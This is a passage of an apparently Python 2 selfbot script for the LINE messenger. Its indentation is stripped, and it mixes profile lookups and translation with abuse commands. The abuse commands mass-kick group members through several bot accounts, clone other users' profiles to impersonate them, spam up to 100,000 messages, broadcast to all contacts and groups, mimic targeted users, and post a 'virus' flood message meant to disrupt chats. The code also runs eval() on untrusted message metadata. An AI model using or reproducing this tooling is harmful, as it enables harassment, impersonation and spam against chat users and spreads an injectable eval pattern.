key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
elif "Getprofile" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cl.sendText(msg.to,"💗ชื่อ💗 :\n" + contact.displayName + "\n\n💗สเตตัส💗 :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithURL(msg.to,path)
except:
pass
elif "Getcontact" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)
elif "Getinfo" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu))
except:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu))
elif "Getbio" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
except:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
#----------------------------------------------------
elif "Mycopy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Mycopy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
cl.cloneContactProfile(target)
cl.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
#=================================================
elif msg.text in ["Mybackup"]:
try:
cl.updateDisplayPicture(mybackup.pictureStatus)
cl.updateProfile(mybackup)
cl.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
cl.sendText(msg.to, str (e))
#-------------------------------- PP BY TAG ---------------------------------
elif "pp @" in msg.text:
if msg.toType == 2:
cover = msg.text.replace("pp @","")
_nametarget = cover.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
h = cl.getContact(target)
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
xname = cl.getContact(msg.from_).displayName
cl.sendText(msg.to,"Kepo Kaka Yaa "+xname+"\n (`・ω・´)\n \n" + datetime.now().strftime('%H:%M:%S'))
except Exception as error:
print error
cl.sendText(msg.to,"Upload image failed.")
elif "Pp @" in msg.text:
if msg.toType == 2:
cover = msg.text.replace("Pp @","")
_nametarget = cover.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
h = cl.getContact(target)
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
except Exception as error:
print error
cl.sendText(msg.to,"Upload image failed.")
elif msg.text.lower() in ["pap owner","pap creator"]:
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/0hQHBfiuxIDmd_HyI5amNxMENaAAoIMQgvBywTVFNIAgRTLk9kRHBCAlkcAFMGKkBiS3hAUQgbBVFU")
#----------------------------------------------------------------------
elif msg.text in ["Rejectall"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Completion。")
ki.sendText(msg.to,"Completion。")
ki2.sendText(msg.to,"Completion。")
ki3.sendText(msg.to,"Completion。")
ki4.sendText(msg.to,"Completion。")
ki5.sendText(msg.to,"💟ทำการลบห้องรันหมดแล้ว💟")
else:
cl.sendText(msg.to,"key is wrong。")
#----------------------------------------------------------------
elif msg.text in ["Reject","ลบรัน"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปฏิเสทคำเชิญเข้ากลุ่มทั้งหมดเรียบร้อย")
else:
cl.sendText(msg.to,"key is wrong")
elif msg.text in ["Reject1","ลบรัน1"]:
gid = ki.getGroupIdsInvited()
for i in gid:
ki.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki.sendText(msg.to,"ปฏิเสทค้างเชิญเรียบร้อย")
else:
ki.sendText(msg.to,"key is wrong")
#========================================
elif msg.text.lower() == 'welcome':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
#=========================================
#-----------------------------------------------
elif "vdo:" in msg.text.lower():
if msg.toType == 2:
query = msg.text.split(":")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Youtube ' in msg.text:
try:
textToSearch = (msg.text).replace('Youtube ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
cl.sendText(msg.to,'https://www.youtube.com' + results['href'])
except:
cl.sendText(msg.to,"Could not find it")
#==================================================
# elif msg.text in ["ทีมงาน","ทีมทดลองบอท"]:
# msg.contentType = 13
# cl.sendText(msg.to, "[SELFBOT PHET HACK BOT]\n\n[☢Ŧ€₳M≈ನန้ণএ≈฿❂Ŧ☢]\n[By.ทีมงานทีมทดลองบอท]")
# cl.sendText(msg.to, "ผู้จัดการทีมงาน:kielovebot")
# msg.contentMetadata = {'mid': 'uca51afa767df87ba3705494b97c3355c'}
# cl.sendMessage(msg)
#=====================================================
#-----------------------------------------------
#==================================================
#=====================================================
#=================================================================================
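# Translation commands: "Tr-id", "Tr-en" and "Tr-th" use the Translator() object
# imported earlier (googletrans-style API, assumed), while "Id@en", "En@id",
# "Id@th" and "Th@id" scrape the mobile Google Translate page with urllib2 and
# pull the result out of the class="t0" element.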
elif "Tr-id " in msg.text:
isi = msg.text.replace("Tr-id ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-en " in msg.text:
isi = msg.text.replace("Tr-en ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-th " in msg.text:
isi = msg.text.replace("Tr-th ","")
translator = Translator()
hasil = translator.translate(isi, dest='th')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Id@en" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'en'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Indonesia----\n" + "" + kata + "\n\n----Ke Inggris----\n" + "" + result)
elif "En@id" in msg.text:
bahasa_awal = 'en'
bahasa_tujuan = 'id'
kata = msg.text.replace("En@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Inggris----\n" + "" + kata + "\n\n----Ke Indonesia----\n" + "" + result)
elif "Id@th" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'th'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Indonesia----\n" + "" + kata + "\n\n----Ke Thailand----\n" + "" + result)
elif "Th@id" in msg.text:
bahasa_awal = 'th'
bahasa_tujuan = 'id'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Thailand----\n" + "" + kata + "\n\n----Ke Indonesia----\n" + "" + result)
elif msg.text in ["Friendlist"]:
contactlist = cl.getAllContactIds()
kontak = cl.getContacts(contactlist)
num=1
msgs="═════════List Friend═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Friend═════════\n\nTotal Friend : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Memlist"]:
kontak = cl.getGroup(msg.to)
group = kontak.members
num=1
msgs="═════════List Member═�����═══════-"
for ids in group:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Member═════════\n\nTotal Members : %i" % len(group)
cl.sendText(msg.to, msgs)
#=========================================
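# Mimic mode: the commands below only toggle wait3["copy"] / wait3["copy2"] and
# manage the wait3["target"] list; the actual mirroring of target users'
# messages is assumed to happen in another handler of the full script.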
elif msg.text in ["Mimic on","mimic on"]:
if wait3["copy"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic On")
else:
wait3["copy"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic On")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Mimic off","mimic:off"]:
if wait3["copy"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic Off")
else:
wait3["copy"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic Off")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Target list"]:
if wait3["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in wait3["target"]:
mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if wait3["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
wait3["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
wait3["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Target @" in msg.text:
target = msg.text.replace("Target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
wait3["target"][t] = True
cl.sendText(msg.to,"Target added")
elif "Del target @" in msg.text:
target = msg.text.replace("Del target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
del wait3["target"][t]
cl.sendText(msg.to,"Target deleted")
#=======================================
#========================================
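# "Nk <name>": temporarily opens the group's join ticket, lets ki2 join via the
# ticket, has ki5 kick every member whose display name contains <name>, then
# re-locks the ticket.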
elif "Nk " in msg.text:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
cl.sendText(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki5.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
ki5.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
#----------------------------------------------------
elif msg.text in ["Aslogin","ขอลิ้ง"]:
if AsulLogged == False:
ki.login(qr=True)
ki.loginResult()
user2 = ki.getProfile().mid
AsulLogged = True
cl.sendText(msg.to,"ล็อคอินสำเร็จ Asul พร้อมใช้งานแล้ว")
else:
cl.sendText(msg.to,"Asul ได้ทำการล็อคอินไปแล้ว")
elif msg.text.lower() == ".":
gs = []
try:
gs = cl.getGroup(msg.to).members
except:
try:
gs = cl.getRoom(msg.to).contacts
except:
pass
tlist = ""
for i in gs:
tlist = tlist+i.displayName+" "+i.mid+"\n\n"
if AsulLogged == True:
try:
ki.sendText(user1,tlist)
except:
ki.new_post(tlist)
else:
cl.sendText(msg.to,"Asul ยังไม่ได้ล็อคอิน")
#-----------------------------------------------------------)
elif msg.text in ["Help2","Key","KEY"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,help2Message)
else:
cl.sendText(msg.to,help2Message)
#----------------------ADMIN COMMAND------------------------------#
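# Admin commands: "Kick @name" resolves its targets from the MENTION metadata of
# the message, and "Mention"/"Tagall" builds mention messages in chunks of 100
# members, each MENTIONEES entry carrying S/E character offsets into the
# repeated "@Krampus" placeholder text.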
elif ("Kick " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif msg.text in ["Mention","Tagall"]:
group = cl.getGroup(msg.to)
k = len(group.members)//100
for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*100 : (j+1)*100]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
cl.sendMessage(msg)
elif "Ratakan" in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Ratakan","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("all","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"user does not exist")
pass
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki2,ki3,ki4,ki5]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Sukses Bosqu")
cl.sendText(msg.to,"masih mauko sundala")
elif msg.text in ["List grup"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
h = "===[List Groups]==="
total = str(len(gid))
for i in gid:
if i is not None:
try:
groups = cl.getGroup(i)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
h += "\n[" + groups.name + "] ->(" + members +")\n -+GroupID : " + i
except:
break
else:
break
if gid is not None:
cl.sendText(msg.to,h + "\n|[Total Groups]| : " + str(total))
else:
cl.sendText(msg.to,"Tidak ada grup saat ini")
ginv = cl.getGroupIdsInvited()
j = "===[List Groups Invited]==="
totals = str(len(ginv))
for z in ginv:
if z is not None:
try:
groups = cl.getGroup(z)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
j += "\n[" + groups.name + "] ->(" + members + ")\n -+GroupID : " + i
except:
break
else:
break
if ginv is not None:
cl.sendText(msg.to,j + "\n|[Total Groups Invited]| : " + str(totals))
else:
cl.sendText(msg.to,"Tidak ada grup tertunda saat ini")
elif msg.text in ["Info grup"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
cl.sendText(msg.to,"===[List Details Group]===")
total = str(len(gid))
for i in gid:
if i is not None:
try:
groups = ki.getGroup(i)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
h = "[" + groups.name + "]\n -+GroupID : " + i + "\n -+Members : " + members + "\n -+MembersPending : " + pendings + "\n -+Creator : " + groups.creator.displayName
except:
break
else:
break
if gid is not None:
cl.sendText(msg.to,h)
cl.sendText(msg.to,"|[Total Groups]| : " + str(total))
else:
cl.sendText(msg.to,"Tidak ada grup saat ini")
ginv = cl.getGroupIdsInvited()
cl.sendText(msg.to,"===[List Details Groups Invited]===")
totals = str(len(ginv))
for z in ginv:
if z is not None:
try:
groups = cl.getGroup(z)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
j = "[" + groups.name + "]\n -+GroupID : " + z + "\n -+Members : " + members + "\n -+MembersPending : " + pendings + "\n -+Creator : " + groups.creator.displayName
except:
break
else:
break
if ginv is not None:
cl.sendText(msg.to,j)
cl.sendText(msg.to,"|[Total Groups Invited]| : " + str(totals))
else:
cl.sendText(msg.to,"Tidak ada grup tertunda saat ini")
elif "Details grup: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("Details grup: ","")
if gid in [""," "]:
cl.sendText(msg.to,"Grup id tidak valid")
else:
try:
groups = cl.getGroup(gid)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
h = "[" + groups.name + "]\n -+GroupID : " + gid + "\n -+Members : " + members + "\n -+MembersPending : " + pendings + "\n -+Creator : " + groups.creator.displayName + "\n -+GroupPicture : http://dl.profile.line.naver.jp/" + groups.pictureStatus
cl.sendText(msg.to,h)
except Exception as error:
cl.sendText(msg.to,(error))
elif "Cancel invite: " in msg.text:
if msg.from_ in admin:
gids = msg.text.replace("Cancel invite: ","")
gid = cl.getGroup(gids)
for i in [gids]:
if i is not None:
try:
cl.rejectGroupInvitation(i)
except:
cl.sendText(msg.to,"Error!")
break
else:
break
if gid is not None:
cl.sendText(msg.to,"Berhasil tolak undangan dari grup " + gid.name)
else:
cl.sendText(msg.to,"Grup tidak ditemukan")
elif msg.text in ["Accept invite"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
_list = ""
for i in gid:
if i is not None:
gids = cl.getGroup(i)
_list += gids.name
cl.acceptGroupInvitation(i)
else:
break
if gid is not None:
cl.sendText(msg.to,"Berhasil terima semua undangan dari grup :\n" + _list)
else:
cl.sendText(msg.to,"Tidak ada grup yang tertunda saat ini")
elif "Myname: " in msg.text:
string = msg.text.replace("Myname: ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Nama " + string)
elif "Mybio: " in msg.text:
string = msg.text.replace("Mybio: ","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Bio " + string)
elif ("Gname: " in msg.text):
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.name = msg.text.replace("Gname: ","")
cl.updateGroup(group)
else:
cl.sendText(msg.to,"Tidak Dapat Mengubah Nama Grup")
elif "Kick: " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick: ","")
cl.kickoutFromGroup(msg.to,[midd])
elif "Invite: " in msg.text or "ดึง: " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite: ","").replace("ดึง: ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif "My @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("My @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Copy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.cloneContactProfile(target)
cl.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy1 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy1 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki.cloneContactProfile(target)
ki.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy2 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy2 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki2.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki2.cloneContactProfile(target)
ki2.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy3 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy3 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki3.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki3.cloneContactProfile(target)
ki3.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy4 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy4 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki4.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki4.cloneContactProfile(target)
ki4.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy5 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy5 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki5.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki5.cloneContactProfile(target)
ki5.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif msg.text in ["backup"]:
try:
cl.updateDisplayPicture(mybackup.pictureStatus)
cl.updateProfile(mybackup)
cl.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
cl.sendText(msg.to, str (e))
elif msg.text in ["Backup"]:
try:
ki.updateDisplayPicture(backup.pictureStatus)
ki.updateProfile(backup)
ki.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
ki.sendText(msg.to, str (e))
elif "Bc:ct " in msg.text:
bctxt = msg.text.replace("Bc:ct ", "")
a = cl.getAllContactIds()
for manusia in a:
cl.sendText(manusia, (bctxt))
elif "Bot:ct " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Bot:ct ", "")
b = ki.getAllContactIds()
for manusia in b:
ki.sendText(manusia, (bctxt))
c = ki2.getAllContactIds()
for manusia in c:
ki2.sendText(manusia, (bctxt))
d = ki3.getAllContactIds()
for manusia in d:
ki3.sendText(manusia, (bctxt))
e = ki4.getAllContactIds()
for manusia in e:
ki4.sendText(manusia, (bctxt))
f = ki5.getAllContactIds()
for manusia in f:
ki5.sendText(manusia, (bctxt))
elif "Bc:grup " in msg.text:
bctxt = msg.text.replace("Bc:grup ", "")
a = cl.getGroupIdsJoined()
for manusia in a:
cl.sendText(manusia, (bctxt))
elif "Bot:grup " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Bot:grup ", "")
b = ki.getGroupIdsJoined()
for manusia in b:
ki.sendText(manusia, (bctxt))
c = ki2.getGroupIdsJoined()
for manusia in c:
ki2.sendText(manusia, (bctxt))
d = ki3.getGroupIdsJoined()
for manusia in d:
ki3.sendText(manusia, (bctxt))
e = ki4.getGroupIdsJoined()
for manusia in e:
ki4.sendText(manusia, (bctxt))
f = ki5.getGroupIdsJoined()
for manusia in f:
ki5.sendText(manusia, (bctxt))
elif "Spam " in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (teks+"\n")
if txt[1] == "on":
if jmlh <= 100000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of Range!")
elif txt[1] == "off":
if jmlh <= 100000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out Of Range!")
elif msg.text in ["me","Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif cms(msg.text,["แอดมิน","Creator"]):
msg.contentType = 13
msg.contentMetadata = {'mid': admsa}
cl.sendText(msg.to," My Creator ")
cl.sendMessage(msg)
cl.sendText(msg.to," Dont Kick out From group ")
elif "Inviteme: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("Inviteme: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
elif msg.text in ["Clear grup"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = ki2.getGroupIdsJoined()
gid = ki3.getGroupIdsJoined()
gid = ki4.getGroupIdsJoined()
gid = ki5.getGroupIdsJoined()
for i in gid:
ki.leaveGroup(i)
ki2.leaveGroup(i)
ki3.leaveGroup(i)
ki4.leaveGroup(i)
ki5.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Bot Sudah Keluar Di semua grup")
else:
cl.sendText(msg.to,"He declined all invitations")
elif msg.text in ["Ginfo","เชคกลุ่ม"]:
group = cl.getGroup(msg.to)
try:
gCreator = group.creator.displayName
except:
gCreator = "Error"
md = "[Nama Grup : ]\n" + group.name + "\n\n[Id Grup : ]\n" + group.id + "\n\n[Pembuat Grup :]\n" + gCreator + "\n\n[Gambar Grup : ]\nhttp://dl.profile.line-cdn.net/" + group.pictureStatus
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
cl.sendText(msg.to,md)
elif msg.text == "ไวรัส01":
# the original flood message was one extremely long hard-coded run of "1." characters
# split across lines; it is rebuilt here programmatically (repeat count approximated)
flood = "1." * 4000
cl.sendText(msg.to,"หยุดดดดดด....\nขอให้ทุกคนอยู่ในความสงบ\n\n " + flood + "\n\nMakasih Sudah Dilihat :)\nJangan Dikick ampun mzz :v")
elif ".music" in msg.text.lower():
songname = msg.text.lower().replace(".music","").strip()
params = {"songname": songname}
